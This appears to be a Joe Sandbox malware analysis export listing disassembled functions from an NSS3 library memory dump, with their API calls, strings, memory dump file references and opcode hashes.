PR_SetError.NSS3(FFFFE005,00000000), ref: 6C554E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C554E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C554E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C554E85
DER_Encode_Util.NSS3(?,?,6C6A05A4,00000000), ref: 6C554EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C554F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C554F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C554F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C554F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C554F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C554FC8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: ba134d015b62c1fd0354ba602752fef81765b9aa634e480a04b2c33e20863ee3
Instruction ID: a8c1b186969164908baf97fb5d9ddbe9d2ad76dcb159e8536df8d657a5d83a4a
Opcode Fuzzy Hash: ba134d015b62c1fd0354ba602752fef81765b9aa634e480a04b2c33e20863ee3
Instruction Fuzzy Hash: D181A171A083019FE701CF69DC80B9BB7E4AF85308F54892AF959DB740E731E925CB92

Function 6C595C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C595C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C595CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C595CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C595D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C595D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C595D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C595E18
TlsGetValue.KERNEL32 ref: 6C595E5E
EnterCriticalSection.KERNEL32(?), ref: 6C595E72
PR_Unlock.NSS3(?), ref: 6C595E8B

Part of subcall function 6C58F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C58F854
Part of subcall function 6C58F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C58F868
Part of subcall function 6C58F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C58F882
Part of subcall function 6C58F820: free.MOZGLUE(04C483FF,?,?), ref: 6C58F889
Part of subcall function 6C58F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C58F8A4
Part of subcall function 6C58F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C58F8AB
Part of subcall function 6C58F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C58F8C9
Part of subcall function 6C58F820: free.MOZGLUE(280F10EC,?,?), ref: 6C58F8D0

Strings

d, xrefs: 6C595C36
tokens=[0x%x=<%s>], xrefs: 6C595D3D

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: 019c09edc447295ed85712c1a35a963b1e5668d6e860301e4753a801dbddf13e
Instruction ID: 2ddbdbffa0cd1e839ed15770498283ec0bab152df5669dc0140a79d910d37a46
Opcode Fuzzy Hash: 019c09edc447295ed85712c1a35a963b1e5668d6e860301e4753a801dbddf13e
Instruction Fuzzy Hash: 567118B0E05241DBEB009F25EC8576E3375AF8430DF9406B5EC099AB42EB32ED25C792

Function 6C588F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C589582), ref: 6C588F5B

Part of subcall function 6C59BE30: SECOID_FindOID_Util.NSS3(6C55311B,00000000,?,6C55311B,?), ref: 6C59BE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C588F6A

Part of subcall function 6C5A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5487ED,00000800,6C53EF74,00000000), ref: 6C5A1000
Part of subcall function 6C5A0FF0: PR_NewLock.NSS3(?,00000800,6C53EF74,00000000), ref: 6C5A1016
Part of subcall function 6C5A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5487ED,00000008,?,00000800,6C53EF74,00000000), ref: 6C5A102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C588FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C588FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C66D820,6C589576), ref: 6C588FF9
DER_GetInteger_Util.NSS3(?), ref: 6C58901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C58903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C589062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C5890A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C5890CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C5890F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C58912D
free.MOZGLUE(00000000), ref: 6C589136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C589145

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 6f5782a6303c58c794ec81f3005ffb4cbfbc4c8a94db421dca410799ce3e0722
Instruction ID: 2a878f0b9581c6651441e66eefb9ce162e0c726521d35b9999d2c5b37bee6e58
Opcode Fuzzy Hash: 6f5782a6303c58c794ec81f3005ffb4cbfbc4c8a94db421dca410799ce3e0722
Instruction Fuzzy Hash: 7A5103B2A092509BEB00CF29DC81B9BB7E9EF84318F144929E855D7741E731E949CBD3

Function 6C53AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C53AF47

Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090AB
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090C9
Part of subcall function 6C609090: EnterCriticalSection.KERNEL32 ref: 6C6090E5
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C609116
Part of subcall function 6C609090: LeaveCriticalSection.KERNEL32 ref: 6C60913F

FreeLibrary.KERNEL32(?), ref: 6C53AF6D
free.MOZGLUE(?), ref: 6C53AFA4
free.MOZGLUE(?), ref: 6C53AFAA
PR_ExitMonitor.NSS3 ref: 6C53AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C53AFF5
PR_ExitMonitor.NSS3 ref: 6C53B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C53B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C53B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C53B03C

Strings

Unloaded library %s, xrefs: 6C53B023
%s decr => %d, xrefs: 6C53AFF0

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 432e2ad44c5ceec7328334ad65a97334c7286baffdb3d9bf278431cb41e73473
Instruction ID: 84132945260f5a5e4e431854f4c2545222a4da88ed1a579d683d423683d2ccbd
Opcode Fuzzy Hash: 432e2ad44c5ceec7328334ad65a97334c7286baffdb3d9bf278431cb41e73473
Instruction Fuzzy Hash: 2A31E8B9B44121ABDB01DFA5EC80A19B775EF4631CF145225E80D97A11F322F824CBA9

Function 6C586C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C58781D,00000000,6C57BE2C,?,6C586B1D,?,?,?,?,00000000,00000000,6C58781D), ref: 6C586C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C58781D,?,6C57BE2C,?), ref: 6C586C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C58781D), ref: 6C586C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C586C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C586C96

Part of subcall function 6C531240: TlsGetValue.KERNEL32(00000040,?,6C53116C,NSPR_LOG_MODULES), ref: 6C531267
Part of subcall function 6C531240: EnterCriticalSection.KERNEL32(?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C53127C
Part of subcall function 6C531240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C531291
Part of subcall function 6C531240: PR_Unlock.NSS3(?,?,?,?,6C53116C,NSPR_LOG_MODULES), ref: 6C5312A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C586CAA

Strings

dbm, xrefs: 6C586CA4
extern:, xrefs: 6C586C7E
sql:, xrefs: 6C586C52
NSS_DEFAULT_DB_TYPE, xrefs: 6C586C91
dbm:, xrefs: 6C586C3A
rdb:, xrefs: 6C586C69

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: c9f8f7967d3098e61c81f6007729cfb507d6cc73657a556976a068b21e9be378
Instruction ID: c0388a63adf5e6b4dbe1added6f4572bbfced3f1a51614ba28268de8c6deaa3e
Opcode Fuzzy Hash: c9f8f7967d3098e61c81f6007729cfb507d6cc73657a556976a068b21e9be378
Instruction Fuzzy Hash: 17018FB17033227BFB102E7B5C8AF26255C9B51158F140431FE0AE0981EEA6E92584BD

Function 6C594E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C5578F8), ref: 6C594E6D

Part of subcall function 6C5309E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C5306A2,00000000,?), ref: 6C5309F8
Part of subcall function 6C5309E0: malloc.MOZGLUE(0000001F), ref: 6C530A18
Part of subcall function 6C5309E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C530A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C5578F8), ref: 6C594ED9

Part of subcall function 6C585920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C587703,?,00000000,00000000), ref: 6C585942
Part of subcall function 6C585920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C587703), ref: 6C585954
Part of subcall function 6C585920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C58596A
Part of subcall function 6C585920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C585984
Part of subcall function 6C585920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C585999
Part of subcall function 6C585920: free.MOZGLUE(00000000), ref: 6C5859BA
Part of subcall function 6C585920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C5859D3
Part of subcall function 6C585920: free.MOZGLUE(00000000), ref: 6C5859F5
Part of subcall function 6C585920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C585A0A
Part of subcall function 6C585920: free.MOZGLUE(00000000), ref: 6C585A2E
Part of subcall function 6C585920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C585A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C594EB3

Part of subcall function 6C594820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C594EB8,?,?,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C59484C
Part of subcall function 6C594820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C594EB8,?,?,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C59486D
Part of subcall function 6C594820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C594EB8,?), ref: 6C594884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C594EC0

Part of subcall function 6C594470: TlsGetValue.KERNEL32(00000000,?,6C557296,00000000), ref: 6C594487
Part of subcall function 6C594470: EnterCriticalSection.KERNEL32(?,?,?,6C557296,00000000), ref: 6C5944A0
Part of subcall function 6C594470: PR_Unlock.NSS3(?,?,?,?,6C557296,00000000), ref: 6C5944BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C594F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C594F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C594F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C594F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C594F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C594F8F
PK11_UpdateSlotAttribute.NSS3(?,6C66DCB0,00000000), ref: 6C594FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C59501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C5578F8), ref: 6C59506B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 5585f4a333a30418885bdba22dbf644378d571f0e2b42e542c33ec96a9c3db27
Instruction ID: 9f79d44325f165861236a0ebed843deba2e09f01d850bf8b284c3315be20f1b0
Opcode Fuzzy Hash: 5585f4a333a30418885bdba22dbf644378d571f0e2b42e542c33ec96a9c3db27
Instruction Fuzzy Hash: EF51E3B1900242DBDB119F26EC45A9B37B4FF4535DF180675E81A86B11F731ED248A92

Function 6C53ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C53ACE2
malloc.MOZGLUE(00000001), ref: 6C53ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C53AD02
TlsGetValue.KERNEL32 ref: 6C53AD3C
calloc.MOZGLUE(00000001,?), ref: 6C53AD8C
PR_Unlock.NSS3 ref: 6C53ADC0
free.MOZGLUE(00000000), ref: 6C53AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6C53AE58
free.MOZGLUE(00000000), ref: 6C53AE69
free.MOZGLUE(?), ref: 6C53AE78
PR_Unlock.NSS3 ref: 6C53AE8C
free.MOZGLUE(?), ref: 6C53AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C53AEC7

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 0dcc126c18f991011187b21dcce6505308e8645f7033c068a8217bf0fe2a3224
Instruction ID: 627c898dc32520ef77867a933b1aea5a925c88398db588c9d8fbebc725d4d506
Opcode Fuzzy Hash: 0dcc126c18f991011187b21dcce6505308e8645f7033c068a8217bf0fe2a3224
Instruction Fuzzy Hash: 0151C2B0E00226DBDF01DFDADC816AEB774BB46349F141825D809A7B50F331A954CBEA

Function 6C614C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6C614CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C614CFD
sqlite3_value_text16.NSS3(?), ref: 6C614D44

Strings

unknown error, xrefs: 6C614D56
out of memory, xrefs: 6C614C78, 6C614C9E
API call with %s database connection pointer, xrefs: 6C614CF6
bad parameter or other API misuse, xrefs: 6C614D05
abort due to ROLLBACK, xrefs: 6C614D27, 6C614D33
another row available, xrefs: 6C614D20
invalid, xrefs: 6C614CF1
no more rows available, xrefs: 6C614D2E

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: c1bb6f703043f790e7cbb8eee620cd1c68b07486f268be03f5c3eb68efc6e81f
Instruction ID: f791cebd7868a3df0a7e45a1ba99927be40350b37e4fbc65d68c65c3ab56b8f6
Opcode Fuzzy Hash: c1bb6f703043f790e7cbb8eee620cd1c68b07486f268be03f5c3eb68efc6e81f
Instruction Fuzzy Hash: 823166B2E0C911A7DB084A2DA8017F573A17B8231EF250529D4244BF24DBE1AC2287EE

Function 6C612D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C612D9F

Part of subcall function 6C4CCA30: EnterCriticalSection.KERNEL32(?,?,?,6C52F9C9,?,6C52F4DA,6C52F9C9,?,?,6C4F369A), ref: 6C4CCA7A
Part of subcall function 6C4CCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4CCB26

sqlite3_exec.NSS3(?,?,6C612F70,?,?), ref: 6C612DF9
sqlite3_free.NSS3(00000000), ref: 6C612E2C
sqlite3_free.NSS3(?), ref: 6C612E3A
sqlite3_free.NSS3(?), ref: 6C612E52
sqlite3_mprintf.NSS3(6C67AAF9,?), ref: 6C612E62
sqlite3_free.NSS3(?), ref: 6C612E70
sqlite3_free.NSS3(?), ref: 6C612E89
sqlite3_free.NSS3(?), ref: 6C612EBB
sqlite3_free.NSS3(?), ref: 6C612ECB
sqlite3_free.NSS3(00000000), ref: 6C612F3E
sqlite3_free.NSS3(?), ref: 6C612F4C

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: e4b299dd85c46e1750c0329c590f74531e8d5d4b0a2dd030e4c7e812fdbe918b
Instruction ID: 48b7296084784cb45bc2c0fb6d72c3950038eb42fd994605fac98bde6d939325
Opcode Fuzzy Hash: e4b299dd85c46e1750c0329c590f74531e8d5d4b0a2dd030e4c7e812fdbe918b
Instruction Fuzzy Hash: F2618CB5E082069BEB00CFA8D884BDEB7F1EF5A349F144028DC15A7B51E731E855CBA5

Function 6C557C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C6A2120,Function_00097E60,00000000,?,?,?,?,6C5D067D,6C5D1C60,00000000), ref: 6C557C81

Part of subcall function 6C4C4C70: TlsGetValue.KERNEL32(?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4C97
Part of subcall function 6C4C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CB0
Part of subcall function 6C4C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CC9

TlsGetValue.KERNEL32 ref: 6C557CA0
EnterCriticalSection.KERNEL32(?), ref: 6C557CB4
PR_Unlock.NSS3 ref: 6C557CCF

Part of subcall function 6C5EDD70: TlsGetValue.KERNEL32 ref: 6C5EDD8C
Part of subcall function 6C5EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5EDDB4

TlsGetValue.KERNEL32 ref: 6C557D04
EnterCriticalSection.KERNEL32(?), ref: 6C557D1B
realloc.MOZGLUE(-00000050), ref: 6C557D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C557DF4
PR_Unlock.NSS3 ref: 6C557E0E

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
